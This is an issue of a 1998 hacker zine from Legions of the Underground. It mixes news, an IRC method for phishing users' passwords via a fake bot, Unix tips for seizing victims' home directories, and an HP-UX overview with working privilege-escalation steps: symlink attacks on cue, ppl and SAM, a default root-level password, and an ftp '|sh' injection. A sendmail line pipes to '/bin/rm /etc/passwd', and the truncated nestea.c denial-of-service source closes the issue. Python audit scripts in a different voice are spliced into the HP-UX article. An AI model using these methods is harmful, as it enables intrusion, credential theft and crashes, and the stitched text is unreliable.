===========================================================================
 *-*                  L e  g   i    o      n      s                *-*
                                o    f
                             t    h    e
                    U  n  d  e    r   g   r  o  u   n  d  
               h   t   t   p :  w w w . l e g i o n s . o r g
                           (K e e n_V e r a c i t y)
 
 *-*                                                                *-*
===========================================================================
  

C  o  n  t  e  n  t:                                       /Z1#P10.01/
        
          o-NEWS-o
          
          *About                    |          |- optiklenz
          *------------------------ |          |- 
          *------------------------ |          |- 
          *Beach Con              - |          |- sync
          *------------------------ |          |- 
          *Phreak Zine              |          |- optiklenz
          *------------------------ |          |- 
          *This Months Linkage    - |          |- LegionPhreak
          *------------------------ |          |- 
        
        o-IRC-o

          *Irc Social Engineering   |*revisited|- optiklenz
          *------------------------ |          |-        
          *Legions Script         - |  BitchX  |- HyperLogik
          *------------------------ |          |-

        o-Neophytes-o
         
          *Basic Unix Commands    - |          |- optiklenz
          *------------------------ |          |-    
          *Exploits?                |          |- miah
          *------------------------ |          |-        
          
  
        
         
        o-Security-o
  
          *HPUX Security Overview   | revised  |- tip
          *------------------------ |          |-
          *HPUX Exploits Note       |  bugs    |- optiklenz
          *------------------------ |          |-           
          *Nestea Exploit           | advisory |- dallion
          *------------------------ |          |-
          *Infoseek                 | exploit  |- optiklenz
          *------------------------ |          |-          
          *Fake Mail                | revised  |- optiklenz    
          *------------------------ |          |-          
          *Wingate Exertion         |          |- optiklenz	  
          *------------------------ |          |-   
          *backdoor.c               |          |- jsbach
          *------------------------ |          |-   
          *Ip Spoofing              |          |- optiklenz    
          *------------------------ |          |-            
          *Anal Sniff               |          |- chronic
          *------------------------ |          |-    
          *Back Attack              |          |- chrak
          *------------------------ |          |- 
          *Irix LMR                 |          |- optiklenz
          *------------------------ |          |- 
          *Securing Linux           |          |- BlackIC
          *------------------------ |          |-     
          *FoolProof                |          |- Duncan Silver    
          *------------------------ |          |-     
        

         o-Misc-o
  
          *pnp56K Linux Setup       |          |- mosoka   
          *------------------------ |          |-     
          *Sniffer Log              |          |- chrak 
          *------------------------ |          |-   


         o-Comic Relief-o 
         
           
          *------------------------ |          |-           
          *Young Hackers, and Jail  |          |- Ana1yzer
          *------------------------ |          |-     
          

     

     __________________________________________________________________ 
                        

                      - { = - = N   E   W  S = - = } -



  [ABOUT]-------------------------------------| optiklenz |
          
          This zine covers different aspects of
          computing. This month's security focus is
          concentrated on the HP-UX platform. This
          month's guest editor is Analyzer. Guest
          editors, along with the topic the editor
          is writing on, will change monthly.

          Most of our articles and zines for the
          past 6 years have been distributed through
          bulletin board services: our own Electronic
          Source and Abyss BBS, just to name a couple.
          This is actually our first zine release being
          distro'd via the web. We release a new zine every
          month. If you would like to submit an article for
          the next zine, send email to webmaster@legions.org
          with the subject matter of the article. Also, if
          there is a certain subject you'd like to see written
          about in the next zine, please let us know.
     (1)------------NEWS-------------------------------------(1)

        
  [Beach Con]-------------------------------------| sync |  
          
              
              Last year's Legion Con's (cyber con)
              theme was network utilization; this year
              there will be a multitude of themes,
              ranging from mainstream security and
              cryptology to telephony and other
              types of electronic manipulation.
    (2)------------NEWS-------------------------------------(2)

        
  [Phreak Zine]-------------------------------------| optiklenz |        
                
                We are currently working on our
                Phreak zine. There is progress, but
                production is going extremely slowly,
                as members are currently occupied
                with their own activities.
                Some of the zine's content is
                listed below.
 
               [o] Shadowing your ANI
               [o] Detailing, and using a beige box..
               [o] ATT-CONF
               [o] Phone Tapping
               [o] Discreet frequencies
               [o] Telenet #'s
               [o] More...


               Want to submit an article? Mail
               webmaster@legions.org with the article
               title first. We will either "ok" it or
               decline it depending on your article's
               content or on whether someone has already
               chosen the same subject matter.
      (3)------------NEWS-------------------------------------(3)

  
  [Linkage]-------------------------------------| LegionPhreak |         
                
           This Months Linkage:
 
     They Finally have a static layout  A UDDF.NET production (www.uddf.net)
     http://www.hackers.com             http://www.hackedsites.com
    
     Exploits Galore                    Beat your Meat (It's good for you)
     http://www.rootshell.com           http://www.freshmeat.net

     Rhino9                             Unix Guru
     http://www.rhino9.com              http://www.ugu.com/

                  Link of the month: www.legions.org

    (4)------------NEWS-------------------------------------(4)


                          - { = - = I   R   C = - = } -       


  [Social Engineering]-------------------------------------| optiklenz |    
                     
                       Gaining users' passwords via IRC, Method 1.

                       First you need to have 2 IRC clients open.
                       This method is more authentic if you
                       have operator status in the channel.
                       On one of the open clients name yourself
                       Bot, or something to that effect, and on
                       the other client use your regular nick.
                       If someone is looking to get ops, let them
                       know that there is a Bot in the channel, and
                       that if the user/users want ops they must first
                       identify themselves with the Bot using the
                       /msg Bot identify password command. After you
                       tell them this, either stay or leave the room;
                       either way the passwds will come rolling in. It's
                       less suspicious if you leave, though, because
                       people will think damage can't be done if
                       you're not there to do it. In reality
                       you are still there, because you are the Bot
                       just sitting there collecting passwds. These
                       passwds may be for their email account, website,
                       and other things. So go back later and ask the
                       people that fell for it if they have a website,
                       or for their email address, etc., etc.

                     
     (5)------------IRC--------------------------------------(5)
          
       
    [Legions Script]-------------------------------------| Hyperlogik | 

          Legions script for Linux is due out in a few weeks.
          More info will be posted in the next zine.
     (6)------------IRC--------------------------------------(6)
 
  

                - { = - = N   E   O  P  H  Y  T  E  S = - = } - 
 
   Note: The content of the neophytes section will grow more
         in depth every month, escalating from basic to intermediate,
         and so on...
         
  
 [Basic Unix Commands]-------------------------------------| optiklenz | 
                       
                      who is on     shows who is logged on the system
                      write name    name equiv to the person you want
                                    to chat with (ctrl D exits chat mode)
                      EOT           End of Transfer 
                      du -a         mem check
                      ps -pid user  kills a user
                      passwd        Change your users passwd
                      ls            List all files in a directory (ls-a)
                      telnet        start a telnet session
                      open          open a location
                      ftp           start file transfer session             
                      find          Find a file   
                      cd\dir        dir being sub-directory
                      netstat       See current processes running among
                                    your connection. 
                      chgrp         Changes a file's group ownership
                      cat "file"    type contents try cat /etc/passwd
                                    
                      tcpdump       Packet sniffer, monitor packets
                                    in promiscuous mode
                      rmdir         Deletes one or more directories
                      sleep         Causes a process to become inactive
                                    for a specified
                                    amount of time
                      sort          Sort and merge one or more files
                      spell         Finds spelling errors in a file
                      split         Divides a file
                      stty          Displays or set terminal parameters
                      tail          Displays the end of a file
                      troff         Outputs formatted output to a typesetter
                      tset          Sets other terminal type
                      umask         Allows the user to specify a new creation 
                                    mask
                      uucp          Unix-to-Unix copy
                      vi            Full screen editor
                      wc            Displays details in the file size
                      who           Displays information on the system users
                      write         Used to send a message to another user
                      ifconfig      To see the routing layout/destination
                                    of packets etc  
                      gcc           Compile C based code
                      rm            delete file
                      mv            rename
                      bfs           Scans a large file
                      cal           Displays a calendar
                      mkdir         Create a directory
                      chmod         Assign File permissions
                                    TIP: If you have temp access
                                         to a system chmod 777 $home 
                                         or chmod $email so you have 
                                         access to their home directory,
                                         as well as their email later.
     
    (7)------------NEOPHYTES--------------------------------------(7)
 
  
 [Exploits]-------------------------------------| miah | 


 A lot of people ask me about exploits: what they are, what they do, and how
to use them. Well, I'm writing this document to explain this for hopefully
the last time. It's just starting to bother me that I have to explain this
every time I'm on IRC, so I thought there should be a text explaining them.
Well, here it is.

--- What is an 'Exploit'? ---

 Well, to explain this simply, an exploit is a program that 'exploits' a bug
in a specific piece of software. All exploits are different; they do different
things and exploit different bugs, which is why exploits are always program
specific.
 Exploits are made to get root on different operating systems. They achieve
this by exploiting a bug in software when the software is running as root.
In UNIX-type OS's, software may have to run as root (or UID 0) in order to
perform a specific task that cannot be performed as another user. So basically
the exploit crashes the software while running as root to give you the beautiful
root prompt.

 Well, now that I've answered questions one and two, I'm going to move on to
question 3.

--- How do I use an exploit? ---

 Since exploits are coded in C 99% of the time, you need a shell on the box
you are going to use the exploit on, OR you need to be running the same OS as
the box you are attempting to hack. So basically, you need to put the source
code, or the binary, in your shell account's dir (you want to use a hacked
shell, or a shell that isn't yours, for this :) ). To put it on your shell, you
can ftp to your account and upload it that way, or you can use rz if you are
using a dialup shell. Either way, I shouldn't have to explain those two things
too much; it's pretty easy.

 Once you have the exploit on the box, you just need to compile it. Usually you
would compile the exploit like so:

blah:~/$gcc exploit.c

 That should compile your exploit. However, be aware that some exploit coders
are sneaky pests and like to pick on people who don't know C, so they will
sometimes insert bugs into the exploit so that it cannot be compiled. So
it does help to know C when playing with C :)

 After the compiling is done, you should be able to just run the exploit, and
its work will be done when you see the root prompt. However, not all exploits
are the same, and some might require different command lines to get them to
work.
                 
--- Where can I get some exploits? ---

Well, 2 of the best places I have found for exploits are

http://get.your.exploits.com and http://www.rootshell.com
(8)------------NEOPHYTES--------------------------------------(8)
 
 


 
                   - { = - = S  E  C  U  R  I  T  Y= - = } - 


 [Hpux Security Overview]-------------------------------------| tip | 



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
HP-UX: A Security Overview, Part One                 revision02 17mar98
                                                   http://www.legions.org
---------------------------------------------------------------------------
Table of Contents:

1) Intro and Disclaimer                 5) The Trusted System
2) HP-UX: an Overview                   6) Resources
3) The Setup by Default                 7) Exploits
4) HP-UX Security Measures              8) To Be Continued
---------------------------------------------------------------------------
1) Intro and Disclaimer

a) This text is designed to complement general Unix knowledge. All Unix
   OS's are different in their own right. This text will delve into HP-UX-
   specific areas. This is not a Unix tutorial, rather a supplement to
   fundamental Unix hacking knowledge.
b) This text will cover HP-UX version 10.x primarily. Specifically, 10.10
   and 10.20 will be in mind. 11.0 has been released and I haven't gotten
   to checking it out yet. 9.x is old, and no longer supported by HP. Thus,
   the most logical choice (and most popular version of HP-UX) is 10.x.
c) I'm not perfect; please notify me of any errors in the document. Also,
   if you see anything you want added to this file, feel free to send them
   to me.
d) This text was written for educational purposes only.
e) Thanks to HP, rootshell, and the various other hacker folks that have
   helped me write this article. Special thanks to Colonel Panic for find-
   ing many exploits, some of which I have used as examples. Shouts out to
   my fellow LoU members, the SOD, and the Chicago crew.
---------------------------------------------------------------------------
2) HP-UX: an Overview

   Largely based on SysV, Hewlett Packard's version of Unix, HP-UX, has
undergone many changes and many version updates (current version is 11.0).
While robust in many areas (ie, memory management, overall performance,
etc), security leaves much to be desired. HP's vision of Unix seems to
come from that of a closed network with non-malicious users (ie, /usr/local
being world-writeable); only recently has the Internet exploded, and HP
seems to be playing "catch up" on network and internal security.
HP's solution to security problems has been patches. Lots of patches. You
can see the patches on a system by typing "swlist -l product" (substitute
"fileset" for "product" for more specific information). Patch and
software information is stored in /var/adm/sw, so you can check out older
pre-patched binaries there. As usual, system logs are kept in /var/adm
(along with btmp, utmp, and wtmp).
---------------------------------------------------------------------------
3) The Setup by Default

   By default, HP-UX is VERY insecure. Yes, most Unixes are (by default),
but HP-UX even more so. Here is a brief list of what is insecure by
default:
o /usr/local and subdirectories are world writeable.
o Many applications by default are installed as world writeable (ie, the
  measureware database module for oracle installs this way).
o root's umask is set to: 02.
o cue is installed (see section 7 for the exploit).
o System is un-"Trusted." See section 5.
o Direct login as root possible from all ttys (as a result of being
  un-"Trusted").
o System logging is set pretty minimal (see /etc/syslog.conf); not that it
  matters, as system logging is pretty minimal no matter how you have it.
o /etc/logingroup non-existent. While this is not an insecurity, it's worth
  mentioning.
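The list above is easy to turn into a check. The following Python script is an added example, not part of tip's article: it walks the trees it is given and reports world-writable paths (sticky-bit directories such as /tmp listed separately), setuid binaries (so a default setuid /usr/bin/cue shows up), whether a /tcb directory exists, and which write bits a root umask like 02 leaves open. The tree list, the tcb_dir and root_umask parameters, and the sample directory used to exercise it are constructed here; on a real host it would be run as root against /usr/local and /usr/bin.

```python
import os
import stat

# Added example: audit a tree for the insecure defaults listed above.


def umask_problems(umask_str):
    """Return which write bits an octal umask string such as '02' leaves open."""
    mask = int(umask_str, 8)
    problems = []
    if not mask & 0o020:
        problems.append("group-writable files by default")
    if not mask & 0o002:
        problems.append("world-writable files by default")
    return problems


def scan_tree(root):
    """Return (world_writable, sticky_world_writable, setuid) sorted path lists.

    Symlinks are skipped (their targets are judged where they live), and a
    world-writable directory with the sticky bit, like /tmp, is listed
    separately because that is the one legitimate case.
    """
    paths = [root]
    for dirpath, dirnames, filenames in os.walk(root):
        paths.extend(os.path.join(dirpath, n) for n in dirnames + filenames)
    world_writable, sticky, setuid = [], [], []
    for path in paths:
        try:
            st = os.lstat(path)
        except OSError:
            continue
        mode = st.st_mode
        if stat.S_ISLNK(mode):
            continue
        if mode & stat.S_IWOTH:
            if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
                sticky.append(path)
            else:
                world_writable.append(path)
        if stat.S_ISREG(mode) and mode & stat.S_ISUID:
            setuid.append(path)
    return sorted(world_writable), sorted(sticky), sorted(setuid)


def audit(roots, tcb_dir="/tcb", root_umask="022"):
    """Collect findings; tcb_dir and root_umask are parameters (assumed
    inputs) so the check can also be run against a copied tree offline."""
    findings = {
        "world_writable": [],
        "sticky_world_writable": [],
        "setuid": [],
        "umask": umask_problems(root_umask),
        "trusted_system": os.path.isdir(tcb_dir),
    }
    for root in roots:
        ww, sticky, suid = scan_tree(root)
        findings["world_writable"] += ww
        findings["sticky_world_writable"] += sticky
        findings["setuid"] += suid
    # a setuid cue binary is the specific default the article calls out
    findings["cue_setuid"] = [p for p in findings["setuid"]
                              if os.path.basename(p) == "cue"]
    return findings


if __name__ == "__main__":
    import pprint
    pprint.pprint(audit(["/usr/local", "/usr/bin"], root_umask="02"))
```

The umask check reads the value the way the kernel does: 02 clears only the other-write bit, so everything root creates is still group-writable, which is what makes the default worth listing.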
---------------------------------------------------------------------------
4) HP-UX Security Measures

o Suid scripts not possible
   This is a popular trend in newer Unix OS's. Basically, if you have a
suid script, it will not be run as root. Binaries are what's important.
o Dialup passwords
   You can set an additional password for a dialin device. If you dialed
into an HP-UX server with dialup passwords enabled, you would enter your
usual login and password, then an _additional_ dialup password. Each
dialup password is dependent on the shell; the shell is used as the "login"
field. To explain further, look at /etc/d_passwd:

/bin/sh:qKrbuYLg9B2vU:0:0:::
/bin/csh:4LcBNqYbmdp3Y:0:0:::
/bin/ksh:zKanqUcdEzh3Q:0:0:::

   What's important here are the first two fields (obviously). Two other
things to note. First, if the system is relatively secure, the "login"
field can only be eight characters long. This creates a problem if your
shell is "/usr/local/bin/tcsh" (19 chars). Thus, what's done is either: a
link is created that is less than eight characters (ie, /bin/tsh -> /usr
/local/bin/tcsh) or dialup passwords just aren't used. Second, the file
that lists which ttys are dialin lines is /etc/dialups:

/dev/ttyd0p7

   That's it. That's the format of the file.
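As an added example that is not from the article, here is a Python check of the dialup setup described above: it parses /etc/d_passwd (shell and encrypted password fields), /etc/dialups, and the shell column of /etc/passwd, then reports users whose shell has no d_passwd entry and shells whose path exceeds the eight-character login field, which is exactly the /usr/local/bin/tcsh case. The file contents are constructed from the lines quoted above plus two invented accounts; treating an empty d_passwd password field as "no extra password required" is an assumption of this example.

```python
# Added example: check HP-UX dialup password coverage. The d_passwd and
# dialups lines below are the ones quoted in the article; the alice and bob
# accounts in the passwd sample are invented.

D_PASSWD_SAMPLE = """/bin/sh:qKrbuYLg9B2vU:0:0:::
/bin/csh:4LcBNqYbmdp3Y:0:0:::
/bin/ksh:zKanqUcdEzh3Q:0:0:::
"""

DIALUPS_SAMPLE = "/dev/ttyd0p7\n"

PASSWD_SAMPLE = """root:*:0:3:root:/:/sbin
alice:x:101:20:Alice:/home/alice:/usr/local/bin/tcsh
bob:x:102:20:Bob:/home/bob:/bin/ksh
"""

LOGIN_FIELD_MAX = 8  # the eight-character "login" field limit noted above


def parse_d_passwd(text):
    """Map shell path -> encrypted dialup password (first two fields)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            entries[fields[0]] = fields[1]
    return entries


def parse_dialups(text):
    """Return the dialin tty device paths, one per line."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def parse_passwd_shells(text):
    """Map login -> shell from /etc/passwd lines (seven colon fields)."""
    shells = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 7:
            shells[fields[0]] = fields[6]
    return shells


def check_dialup_coverage(d_passwd_text, passwd_text):
    """Findings per user whose shell the dialup password scheme cannot cover."""
    d_pw = parse_d_passwd(d_passwd_text)
    findings = {}
    for user, shell in parse_passwd_shells(passwd_text).items():
        problems = []
        if shell not in d_pw:
            problems.append("no d_passwd entry for shell %s" % shell)
        elif d_pw[shell] == "":
            # assumption: an empty field means no extra password is asked for
            problems.append("empty dialup password for shell %s" % shell)
        if len(shell) > LOGIN_FIELD_MAX:
            problems.append("shell path is %d chars, over the %d-char login "
                            "field; use a short link"
                            % (len(shell), LOGIN_FIELD_MAX))
        if problems:
            findings[user] = problems
    return findings


if __name__ == "__main__":
    print("dialin lines:", parse_dialups(DIALUPS_SAMPLE))
    for user, problems in check_dialup_coverage(D_PASSWD_SAMPLE,
                                                PASSWD_SAMPLE).items():
        print(user, "->", "; ".join(problems))
```

Run against the real files, the report lists every account whose dialin session would never be asked for the second password, which is the gap the short-link workaround above exists to close.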

o lanscan and ioscan
   Just a side note to the standard commands, ifconfig and netstat.
lanscan will tell you what interface cards you have on the system, which
are up or down, etc, etc. ioscan is similar, but covers the entire system,
ie, hard drives, I/O adapters, memory, etc. Might be useful in getting more
intimate with your system.
---------------------------------------------------------------------------
5) The Trusted System

   What is a "Trusted System"? Check for a /tcb directory. The existence of
a /tcb directory signifies that the system you're on is a "Trusted System."
The conversion to this is done through /usr/sbin/sam by root. Here is what
converting does to a system:
o Pseudo-shadow password scheme (actually uses a "protected password
  database").
o A stricter password authentication system.
o User auditing.
o Access control lists (acls) [note: only supported under hfs, not vxfs]
  [second note: being phased out].
o Terminal and time-based access control.

   Basically to put this all together, in the /tcb/files/auth directory,
there are a number of subdirectories by capital and lowercase letters, ie,
"e," "T," and so forth. This is the initial of the login. In that directory
is a file per user. Thus, root's file would be /tcb/files/auth/r/root.
What's in this file? It's basically like a password entry, with more
fields. ie, /tcb/files/auth/r/root:

root:u_name=root:u_id#0:\
        :u_pwd=Z1Po84UVyBbGE:\
        :u_bootauth:u_auditid#0:\
        :u_auditflag#1:\
        :u_pswduser=root:u_suclog#8895646615:u_lock@:chkent

root's entry in /etc/passwd would then be:
root:*:0:3:root:/:/sbin

   If it isn't obvious, the login and user id of an /etc/passwd entry are
there, along with additional information. The above example has only a few
fields listed.

The full contents of an HP-UX password database file would contain:
a login and user id
b encrypted password
c account owner
d single user mode boot flag
e audit id and audit flag
f minimum time between password change (not in example - u_minchg)
g password max length (not in example - u_maxlen)
h password expiration time (not in example - u_exp)
i password lifetime (not in example - u_life)
j time of last password change (not in example - u_usucchg & u_unsucchg)
k absolute password expiration date (not in example - u_acct_expire)
l max time allowed between logins before acct is locked
  (not in example - u_max_llogin)
m max days before expiration when warning will appear
  (not in example - u_pw_expire_warning)
n user or system generated password? (not in example - u_pickpw)
o type of sys-gen passwords (not in example - u_genpwd)
p triviality check on user-gen (not in example - u_restrict)
q can pick null password? (not in example - u_nullpw)
r userid of last person who changed this password
  (not in example - u_pwchanger)
s random # that user must supply (given to him by the admin) when
  password is reset (not in example - u_pwd_admin_num)
t can user generate random # for a password? (not in example - u_genchars)
u can user generate random letters for a password?
  (not in example - u_genletters)
v time of day when user can login (not in example - u_tod)
w time of last successful login (not in example - u_suclog)
x time of last unsuccessful login (not in example - u_unsuclog)
y term or remote hosts from last successful and unsuccessful logins
  (not in example - u_suctty & u_unsuctty)
z number of unsuccessful logins, this # clears upon a successful login
  (not in example - u_numunsuclog)
1 max number of login attempts before account is locked
  (not in example - u_maxtries)
2 account locked flag (not in example - u_lock)

   In /tcb/files, in addition to auth, there are two files, devassign and
ttys. devassign contains device access info and ttys contains term access
info.

Here are a few lines from devassign:
console:v_devs=/dev/console:v_type=terminal:chkent:
ttyp0:v_devs=/dev/ttyp0:v_type=terminal:chkent:
ttyp1:v_devs=/dev/ttyp1:v_type=terminal:chkent:

The format of this file contains:
a device name
b aliases to that device
c device supported (ie, printer, terminal, tape, or remote)
d users permitted on that device; if not specified, all users may use it

Here are a few lines from ttys:
console:t_devname=console:t_maxtries#777:chkent:
tty:t_devname=tty:chkent:
tty00:t_devname=tty00:chkent:

The above example only has a few fields listed. The full format of this
file contains:
a device name
b last user (id) to log into that tty (not in example - t_uid)
c last successful login time (not in example - t_logtime)
d last unsuccessful login time (not in example - t_unsuctime)
e number of consecutive logins before tty is locked
f terminal lock flag
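The auth, devassign and ttys files share one record syntax, so an added Python example (not from the article) can parse all of them: fields are colon-separated, `name=string` and `name#number` carry values, a bare `name` is a true flag and `name@` a false one (the reading of the flag syntax assumed here), a trailing `\` continues a record onto the next line, and `chkent` ends it. Parsing root's entry and the ttys lines quoted above, it then flags accounts with no u_maxtries and ttys with no t_maxtries or a very high one; the samples are constructed from the page's lines, and the threshold of 10 attempts is the example's own choice.

```python
# Added example: parse HP-UX Trusted System database records
# (/tcb/files/auth/*/*, /tcb/files/ttys) and flag weak settings.
# Both samples are built from the lines quoted in the article.

AUTH_SAMPLE = """root:u_name=root:u_id#0:\\
        :u_pwd=Z1Po84UVyBbGE:\\
        :u_bootauth:u_auditid#0:\\
        :u_auditflag#1:\\
        :u_pswduser=root:u_suclog#8895646615:u_lock@:chkent
"""

TTYS_SAMPLE = """console:t_devname=console:t_maxtries#777:chkent:
tty:t_devname=tty:chkent:
tty00:t_devname=tty00:chkent:
"""


def join_continuations(text):
    """Join lines ending in a backslash into single logical records."""
    records, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        records.append(buf + line)
        buf = ""
    if buf:
        records.append(buf)
    return records


def parse_record(record):
    """Split one record into (name, attrs).

    name=value -> str, name#value -> int, name -> True, name@ -> False
    (the flag syntax as read in this example); 'chkent' and the empty
    fields left by the continuation colons are skipped.
    """
    fields = record.split(":")
    attrs = {}
    for field in fields[1:]:
        if not field or field == "chkent":
            continue
        if "=" in field:
            key, value = field.split("=", 1)
            attrs[key] = value
        elif "#" in field:
            key, value = field.split("#", 1)
            attrs[key] = int(value)
        elif field.endswith("@"):
            attrs[field[:-1]] = False
        else:
            attrs[field] = True
    return fields[0], attrs


def parse_db(text):
    """Parse a whole file into {entry name: attrs}."""
    return dict(parse_record(r) for r in join_continuations(text))


def audit_auth(entries):
    """Findings per account from the protected password database."""
    findings = {}
    for name, a in entries.items():
        problems = []
        if not a.get("u_pwd"):
            problems.append("no encrypted password (u_pwd)")
        if a.get("u_lock") is not True and "u_maxtries" not in a:
            problems.append("no u_maxtries: unlimited login attempts")
        if a.get("u_bootauth"):
            problems.append("u_bootauth set: allowed to boot single-user")
        findings[name] = problems
    return findings


def audit_ttys(entries, max_ok=10):
    """Findings per tty; max_ok is this example's own threshold."""
    findings = {}
    for name, a in entries.items():
        tries = a.get("t_maxtries")
        if tries is None:
            findings[name] = ["no t_maxtries: tty never locks"]
        elif tries > max_ok:
            findings[name] = ["t_maxtries#%d exceeds %d" % (tries, max_ok)]
        else:
            findings[name] = []
    return findings


if __name__ == "__main__":
    print(audit_auth(parse_db(AUTH_SAMPLE)))
    print(audit_ttys(parse_db(TTYS_SAMPLE)))
```

The same parse_db works for devassign, since it uses the same v_name=value fields and chkent terminator; only the audit rules differ per file.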

   In actuality, not many HP-UX systems are set up to be Trusted.
Managing a password database and tweaking it is more work than necessary.
In addition, remote commands are not possible on a Trusted System, unless
it is done _from_ a Trusted System. Lastly, mapping files to sync /etc
/passwd with /tcb/files/auth are contained in /tcb/files/auth/system.
These are called pw_id_map, gr_id_map, and aid_id_map. It is very likely
that these mapping files will get out of sync with the database files. The
solution is removing them and letting them regenerate. However, all in all,
having a Trusted System can prove to take as much maintenance as an
un-Trusted System. It's really the admin's call. I've seen maybe about half
and half these days.
---------------------------------------------------------------------------
6) Resources

o  If you have a question about a patch, check out
ftp://us-support.external.hp.com. All the current patches are available
there for your perusal.

o  http://www.rootshell.com, http://get.your.exploits.org,
http://www.hha.net/hha/exploits, http://www.dhp.com/~fyodor/sploits_hpux.html:
Very good sites with Unix and HP-UX-specific exploits. Both explanations and
source code/scripts are available here.

o  Usenet: comp.os.security.announce and comp.sys.hp.hpux: Sometimes
regular updates of weaknesses. Avoid alt.2600 at all costs.

o  And of course, the ever-so-handy man command.
---------------------------------------------------------------------------
7) Exploits

   These are only a few of many. I only added a few, as I wanted to explain
about HP-UX security in general. Part 2 will delve deeper into exploits
(as well as auditing, system calls, and acls).

o cue bug
   The first thing after gaining access to an HP-UX system is to check if
cue exists (typically in /usr/bin/cue). Make sure it's an suid binary
(which it is by default). Simply set your umask to 000. Now start cue. In
your home directory, do an ll. You'll see that the name of the file created
by cue (in my case, it's called "IDMERROR.ttyp1") is owned by root. You'll
also see that the umask follows and is world-writeable. Now exit cue.
Remove the *ERROR* file created by cue. Think of a file like /etc/passwd or
/.rhosts. Do an "ln -s /etc/passwd ~/IDMERROR.ttyp1" (or whatever suits
your needs). Now start cue again. Exit it. You'll see that the root owned
file that wasn't writeable by anyone not only is now truncated, but it has
world write permission. Do whatever you want with it.

o ftp mget bug
   This won't do you much good if ftp isn't suid root (most likely it
won't be), but this still works (not as root though). In /tmp, create a
separate directory (we'll use "test"). cd to that directory and execute
this command: echo "date > /tmp/BLAH" > "|sh". Notice that /tmp/BLAH does
not exist. Now, ftp to localhost. cd to /tmp/test and do a "mget *".
ftp that file. Now quit ftp and check for a /tmp/BLAH. It exists! cat it.
Now what if ftp was suid root, and the echo command you used to create
"|sh" was this: echo "chmod 777 /etc/passwd" > "|sh"?

o Old SAM bug
   Typically, when SAM (System Administration Manager) is being run by
an admin, a temp file is created in /var/tmp. Newer, patched SAMs use
arbitrary file names, ie OBAMDBAa01687 or aaaa01990, etc. But older SAMs
used a consistent file name when writing this temp file. It was called:
outdata. Since SAM is typically run as root, you'll see what I'm getting
at here (duh, the temp file is owned by root). Simply create a link to a
file, such as /etc/passwd to that temp file (ie, ln -s /etc/passwd /var
/tmp/outdata). Now if root's umask is set to 000, then you'll own /etc
/passwd next time the admin runs SAM. This trick is unlikely these days,
as most SAMs are patched and most admins don't use umask 000 on root.

o Old SAM bug 2
   On older versions of SAM, a user named sam_exec was created with uid 0.
The default password for this on 10.x is: x7vpa5jh
   Simply login as sam_exec, and hit control-c right away for a shell.

o ppl bug
   Another symbolic link exploit. ppl's log file is: /var/ppl/log. Now,
you can simply remove or move this (so that /var/ppl/log is non-existent;
also /var/ppl is world-writeable by default, thus you can do this). This
log file is owned by root (ppl is an suid program). Next, think of a file
that you'd like to nuke and own (if you don't want to get caught, try
/.rhosts instead of something like /etc/passwd; in addition, save the old
/var/ppl/log somewhere to put back when you're done). Now do a: ln -s
/.rhosts /var/ppl/log. Then type:
ppl -o '\
+ +
'
or whatever you want to place in /.rhosts. You get the drift. Now you can
remove /var/ppl/log and put the old one back in place. You can now rlogin
as root.

o Educational Centers
   HP's educational centers are protected mainly by firewalls. But if you
happen to get in, the root password on nearly all machines is simply: hp.
---------------------------------------------------------------------------
8) To Be Continued
   Part Two will delve deeper into the Trusted System, specifically cover-
ing auditing and acls. Exploits will also be covered in greater detail.
---------------------------------------------------------------------------
(c) 1998 tip of Legions of the Underground       http://www.legions.org
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  (9)------------SECURITY--------------------------------------(9)


 [Hpux Exploits Note]-------------------------------------| optiklenz | 

HP_UX        versions 1.2&13.1 sm, -oQ  ==> can read/write any file
5.57       from:<"|/bin/rm /etc/passwd">  && bounce mail....
HPUX <7.0        1--          chfn -- allows newlines, etc ()
HP-UX            1--          sendmail:  mail directly to programs ()
HPUX A.09.01     1--          sendmail:  mail directly to programs ()


1) libXt: this is a widely known security hole that allows local users
to gain root access via setuid X programs like xterm or xload. A
recommendation is to replace the guilty libraries by applying X/Motif
"jumbo" patches, which is a good thing anyway.

2) sendmail: yet another sendmail hole. The best solution at CERN is
maybe to use the public domain version of sendmail (used by default on
all HP-UX 10.20 systems) that does not seem vulnerable.



  (10)------------SECURITY--------------------------------------(10)
 



[Nesta Exploit]-------------------------------------| Dallion | 

---------------------------------------------------------
Note: Nestea by humble
      Code ripped from teardrop by route
---------------------------------------------------------
Basically crashes a machine using "off by one" IP headers.  Like boink and
land reversed.  It's a total rip (the code, that is) but it works, nonetheless.
I have tested it on machines running kernel 2.0.33 and 2.1.95; both
machines went slamming down when I hit them, I like this toy :)   To fix it:

1) if you do packet filtering, set it to filter off-by-one IP headers
2) fix your kernel to not process these packets.

        -Dallion Dalson

Here is the exploit:
nestea.c - exploits the "off by one ip header" bug in Linux

//

// nestea.c by humble of rhino9 4/16/98
// This exploits the "off by one ip header" bug in the linux ip frag code.
// Crashes linux 2.0.* and 2.1.*  and some windows boxes
// this code is a total rip of teardrop - it's messy
// hi sygma

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>

// bsd usage is currently broken because of socket options on the third sendto

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define MAGIC2  108
#define PADDING 256    /* datagram frame padding for first packet */
#define COUNT   500    /* we are overwriting a small number of bytes we 
                        shouldnt have access to in the kernel. 
